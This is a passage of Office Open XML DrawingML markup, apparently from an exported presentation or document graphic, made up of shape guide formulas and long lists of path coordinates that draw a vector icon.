                <a:gd name="T26" fmla="*/ 2052 w 6201"/>
                <a:gd name="T27" fmla="*/ 4872 h 7403"/>
                <a:gd name="T28" fmla="*/ 3202 w 6201"/>
                <a:gd name="T29" fmla="*/ 3764 h 7403"/>
                <a:gd name="T30" fmla="*/ 3779 w 6201"/>
                <a:gd name="T31" fmla="*/ 4956 h 7403"/>
                <a:gd name="T32" fmla="*/ 3328 w 6201"/>
                <a:gd name="T33" fmla="*/ 4237 h 7403"/>
                <a:gd name="T34" fmla="*/ 3638 w 6201"/>
                <a:gd name="T35" fmla="*/ 4163 h 7403"/>
                <a:gd name="T36" fmla="*/ 3816 w 6201"/>
                <a:gd name="T37" fmla="*/ 4835 h 7403"/>
                <a:gd name="T38" fmla="*/ 2976 w 6201"/>
                <a:gd name="T39" fmla="*/ 4137 h 7403"/>
                <a:gd name="T40" fmla="*/ 3281 w 6201"/>
                <a:gd name="T41" fmla="*/ 4315 h 7403"/>
                <a:gd name="T42" fmla="*/ 2750 w 6201"/>
                <a:gd name="T43" fmla="*/ 4310 h 7403"/>
                <a:gd name="T44" fmla="*/ 2992 w 6201"/>
                <a:gd name="T45" fmla="*/ 3985 h 7403"/>
                <a:gd name="T46" fmla="*/ 2625 w 6201"/>
                <a:gd name="T47" fmla="*/ 4111 h 7403"/>
                <a:gd name="T48" fmla="*/ 3160 w 6201"/>
                <a:gd name="T49" fmla="*/ 3785 h 7403"/>
                <a:gd name="T50" fmla="*/ 3958 w 6201"/>
                <a:gd name="T51" fmla="*/ 5334 h 7403"/>
                <a:gd name="T52" fmla="*/ 4032 w 6201"/>
                <a:gd name="T53" fmla="*/ 5056 h 7403"/>
                <a:gd name="T54" fmla="*/ 4121 w 6201"/>
                <a:gd name="T55" fmla="*/ 4919 h 7403"/>
                <a:gd name="T56" fmla="*/ 3932 w 6201"/>
                <a:gd name="T57" fmla="*/ 4620 h 7403"/>
                <a:gd name="T58" fmla="*/ 4131 w 6201"/>
                <a:gd name="T59" fmla="*/ 4305 h 7403"/>
                <a:gd name="T60" fmla="*/ 3611 w 6201"/>
                <a:gd name="T61" fmla="*/ 3885 h 7403"/>
                <a:gd name="T62" fmla="*/ 3433 w 6201"/>
                <a:gd name="T63" fmla="*/ 3627 h 7403"/>
                <a:gd name="T64" fmla="*/ 3559 w 6201"/>
                <a:gd name="T65" fmla="*/ 3276 h 7403"/>
                <a:gd name="T66" fmla="*/ 3334 w 6201"/>
                <a:gd name="T67" fmla="*/ 3549 h 7403"/>
                <a:gd name="T68" fmla="*/ 2629 w 6201"/>
                <a:gd name="T69" fmla="*/ 3082 h 7403"/>
                <a:gd name="T70" fmla="*/ 2856 w 6201"/>
                <a:gd name="T71" fmla="*/ 3244 h 7403"/>
                <a:gd name="T72" fmla="*/ 3123 w 6201"/>
                <a:gd name="T73" fmla="*/ 3597 h 7403"/>
                <a:gd name="T74" fmla="*/ 2897 w 6201"/>
                <a:gd name="T75" fmla="*/ 3859 h 7403"/>
                <a:gd name="T76" fmla="*/ 2399 w 6201"/>
                <a:gd name="T77" fmla="*/ 3607 h 7403"/>
                <a:gd name="T78" fmla="*/ 2367 w 6201"/>
                <a:gd name="T79" fmla="*/ 3617 h 7403"/>
                <a:gd name="T80" fmla="*/ 2052 w 6201"/>
                <a:gd name="T81" fmla="*/ 4090 h 7403"/>
                <a:gd name="T82" fmla="*/ 1952 w 6201"/>
                <a:gd name="T83" fmla="*/ 4127 h 7403"/>
                <a:gd name="T84" fmla="*/ 2556 w 6201"/>
                <a:gd name="T85" fmla="*/ 4148 h 7403"/>
                <a:gd name="T86" fmla="*/ 1958 w 6201"/>
                <a:gd name="T87" fmla="*/ 4862 h 7403"/>
                <a:gd name="T88" fmla="*/ 1480 w 6201"/>
                <a:gd name="T89" fmla="*/ 4499 h 7403"/>
                <a:gd name="T90" fmla="*/ 1858 w 6201"/>
                <a:gd name="T91" fmla="*/ 5040 h 7403"/>
                <a:gd name="T92" fmla="*/ 1984 w 6201"/>
                <a:gd name="T93" fmla="*/ 5140 h 7403"/>
                <a:gd name="T94" fmla="*/ 2399 w 6201"/>
                <a:gd name="T95" fmla="*/ 5329 h 7403"/>
                <a:gd name="T96" fmla="*/ 2887 w 6201"/>
                <a:gd name="T97" fmla="*/ 5413 h 7403"/>
                <a:gd name="T98" fmla="*/ 2719 w 6201"/>
                <a:gd name="T99" fmla="*/ 5670 h 7403"/>
                <a:gd name="T100" fmla="*/ 2776 w 6201"/>
                <a:gd name="T101" fmla="*/ 5759 h 7403"/>
                <a:gd name="T102" fmla="*/ 3044 w 6201"/>
                <a:gd name="T103" fmla="*/ 5439 h 7403"/>
                <a:gd name="T104" fmla="*/ 3895 w 6201"/>
                <a:gd name="T105" fmla="*/ 5413 h 7403"/>
                <a:gd name="T106" fmla="*/ 3317 w 6201"/>
                <a:gd name="T107" fmla="*/ 5791 h 7403"/>
                <a:gd name="T108" fmla="*/ 2488 w 6201"/>
                <a:gd name="T109" fmla="*/ 5806 h 7403"/>
                <a:gd name="T110" fmla="*/ 1721 w 6201"/>
                <a:gd name="T111" fmla="*/ 5245 h 7403"/>
                <a:gd name="T112" fmla="*/ 1480 w 6201"/>
                <a:gd name="T113" fmla="*/ 4499 h 7403"/>
                <a:gd name="T114" fmla="*/ 1669 w 6201"/>
                <a:gd name="T115" fmla="*/ 3759 h 7403"/>
                <a:gd name="T116" fmla="*/ 2446 w 6201"/>
                <a:gd name="T117" fmla="*/ 3129 h 7403"/>
                <a:gd name="T118" fmla="*/ 3317 w 6201"/>
                <a:gd name="T119" fmla="*/ 3129 h 7403"/>
                <a:gd name="T120" fmla="*/ 4126 w 6201"/>
                <a:gd name="T121" fmla="*/ 3817 h 7403"/>
                <a:gd name="T122" fmla="*/ 4278 w 6201"/>
                <a:gd name="T123" fmla="*/ 4468 h 7403"/>
                <a:gd name="T124" fmla="*/ 1611 w 6201"/>
                <a:gd name="T125" fmla="*/ 4032 h 7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201" h="7403">
                  <a:moveTo>
                    <a:pt x="1202" y="1355"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1202" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="5208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="5208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="110" y="5224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="215" y="5240"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="320" y="5261"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="425" y="5281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="525" y="5313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="629" y="5350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="724" y="5387"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="819" y="5428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="913" y="5476"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1008" y="5528"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1096" y="5581"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1181" y="5638"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1265" y="5701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1343" y="5765"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1422" y="5833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1496" y="5906"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1569" y="5980"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1637" y="6059"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1701" y="6137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1764" y="6221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1821" y="6306"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1874" y="6394"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1926" y="6489"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1974" y="6583"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2015" y="6678"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2052" y="6773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2089" y="6877"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2121" y="6977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2141" y="7082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2162" y="7187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2178" y="7292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2194" y="7402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6200" y="7402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6200" y="7402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6184" y="7124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6158" y="6851"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6121" y="6583"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6073" y="6316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6016" y="6053"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5943" y="5796"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5864" y="5544"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5775" y="5292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5675" y="5050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5565" y="4809"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5444" y="4578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5318" y="4352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5181" y="4127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5034" y="3911"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4877" y="3701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4714" y="3502"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4546" y="3302"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4367" y="3113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4184" y="2935"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3989" y="2762"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3790" y="2594"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3580" y="2436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3370" y="2289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3150" y="2147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2923" y="2011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2693" y="1890"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2456" y="1774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2215" y="1670"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1968" y="1575"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1716" y="1491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1459" y="1417"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1202" y="1355"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="598" y="903"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="199" y="200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1002" y="200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="598" y="903"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="3832" y="5355"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3832" y="5355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3748" y="5376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3658" y="5387"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3570" y="5397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3475" y="5402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3381" y="5402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3286" y="5397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3187" y="5387"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3087" y="5376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3087" y="5376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3123" y="5318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3155" y="5255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3187" y="5192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3217" y="5129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3265" y="4998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3302" y="4862"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3302" y="4862"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3364" y="4893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3428" y="4924"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3491" y="4946"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3554" y="4967"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3611" y="4982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3675" y="4998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3738" y="5003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3795" y="5009"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3795" y="5009"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3822" y="5040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3853" y="5066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3890" y="5082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3932" y="5087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3948" y="5087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3948" y="5087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3937" y="5192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3922" y="5292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3922" y="5292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3911" y="5281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3895" y="5281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3895" y="5281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3869" y="5287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3848" y="5303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3832" y="5324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3832" y="5344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3832" y="5355"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2052" y="4872"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2052" y="4872"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2099" y="4767"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2147" y="4667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2205" y="4578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2268" y="4494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2336" y="4421"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2409" y="4352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2488" y="4295"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2567" y="4242"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2567" y="4242"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2593" y="4263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2603" y="4268"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2625" y="4268"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2635" y="4268"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2635" y="4268"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2698" y="4352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2772" y="4436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2845" y="4515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2923" y="4589"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3003" y="4662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3087" y="4725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3170" y="4788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3260" y="4840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3260" y="4840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3244" y="4909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3228" y="4977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3207" y="5045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3181" y="5108"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3150" y="5177"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3118" y="5240"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3081" y="5308"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3044" y="5371"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3044" y="5371"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2923" y="5344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2808" y="5318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2687" y="5287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2572" y="5250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2572" y="5250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2567" y="5229"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2562" y="5213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2551" y="5197"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2540" y="5182"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2525" y="5171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2504" y="5161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2488" y="5156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2467" y="5156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2467" y="5156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2446" y="5156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2430" y="5161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2409" y="5171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2399" y="5182"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2399" y="5182"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2257" y="5119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2126" y="5050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2126" y="5050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2131" y="5024"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2136" y="4998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2136" y="4998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2126" y="4961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2110" y="4924"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2084" y="4893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2052" y="4872"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="3459" y="3817"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3459" y="3817"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3528" y="3917"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3596" y="4016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3596" y="4016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3517" y="4001"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3438" y="3985"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3360" y="3979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3275" y="3979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3275" y="3979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3244" y="3869"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3202" y="3764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3202" y="3764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3312" y="3691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3312" y="3691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3334" y="3701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3354" y="3701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3370" y="3701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3407" y="3748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3407" y="3754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3407" y="3754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3412" y="3774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3423" y="3796"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3438" y="3811"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3459" y="3817"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="3779" y="4956"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3779" y="4956"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3722" y="4946"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3669" y="4930"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3548" y="4893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3433" y="4846"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3317" y="4783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3317" y="4783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3328" y="4693"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3338" y="4604"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3344" y="4509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3344" y="4421"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3338" y="4332"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3328" y="4237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3312" y="4148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3297" y="4058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3297" y="4058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3375" y="4064"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3449" y="4068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3528" y="4074"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3596" y="4090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3596" y="4090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3601" y="4105"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3606" y="4121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3611" y="4137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3628" y="4153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3638" y="4163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3654" y="4168"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3669" y="4174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3690" y="4179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3690" y="4179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3764" y="4326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3827" y="4479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3874" y="4630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3911" y="4783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3911" y="4783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3885" y="4788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3858" y="4799"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3837" y="4814"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3816" y="4835"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3801" y="4856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3790" y="4877"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3779" y="4909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3779" y="4935"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3779" y="4956"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2698" y="4174"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2698" y="4174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2813" y="4132"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2929" y="4100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2929" y="4100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2940" y="4116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2955" y="4127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2976" y="4137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2992" y="4137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2992" y="4137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3023" y="4132"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3044" y="4121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3060" y="4100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3070" y="4074"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3070" y="4074"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3155" y="4064"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3239" y="4058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3239" y="4058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3260" y="4142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3270" y="4226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3281" y="4315"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3291" y="4405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3291" y="4489"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3291" y="4578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3286" y="4667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3275" y="4756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3275" y="4756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3191" y="4709"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3113" y="4652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3034" y="4589"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2960" y="4526"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2887" y="4457"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2819" y="4384"/>
